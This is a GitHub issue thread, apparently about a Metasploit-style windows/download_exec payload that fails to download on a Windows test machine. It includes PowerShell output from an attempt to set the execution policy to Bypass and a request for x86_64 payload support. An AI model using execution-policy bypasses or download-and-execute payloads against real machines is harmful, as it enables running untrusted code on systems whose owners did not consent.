https://github.com/notifications/unsubscribe-auth/AN47WY3N2C33HJ5M5FTM74LQ7DEORANCNFSM4KKNERDQ .

As my user:

PS C:> Get-ExecutionPolicy RemoteSigned PS C:>

I ran a prompt as administrator to try setting it and got the following:

Running set executionpolicy bypass as admin

PS C:\Windows\system32> Set-ExecutionPolicy ByPass Execution Policy Change The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose you to the security risks described in the about_Execution_Policies help topic at https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy? [Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): Y Set-ExecutionPolicy : Windows PowerShell updated your execution policy successfully, but the setting is overridden by a policy defined at a more specific scope. Due to the override, your shell will retain its current effective execution policy of RemoteSigned. Type "Get-ExecutionPolicy -List" to view your execution policy settings. For more information please see "Get-Help Set-ExecutionPolicy". At line:1 char:1 + Set-ExecutionPolicy ByPass + ~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (:) [Set-ExecutionPolicy], SecurityException + FullyQualifiedErrorId : ExecutionPolicyOverride,Microsoft.PowerShell.Commands.SetExecutionPolicyCommand PS C:\Windows\system32>

Get-ExecutionPolicy -list

PS C:\Windows\system32> Get-ExecutionPolicy -List Scope ExecutionPolicy ----- --------------- MachinePolicy RemoteSigned UserPolicy Undefined Process Undefined CurrentUser Undefined LocalMachine Bypass

Still no success, it does not appear to download.

@space-r7 can you generate a PS1 payload that pulls notepad from somewhere? I'll gladly test that on this machine as well.

[klikevil]

I figured out what the issue is. download_exec can't become a 64 bit payload so it has to be run in C:\windows\syswow64\powershell\v1.0\powershell.exe . @space-r7 or @oripka or any moderators/etc can you mark this as feature request and change it to windows/download_exec x86_64 support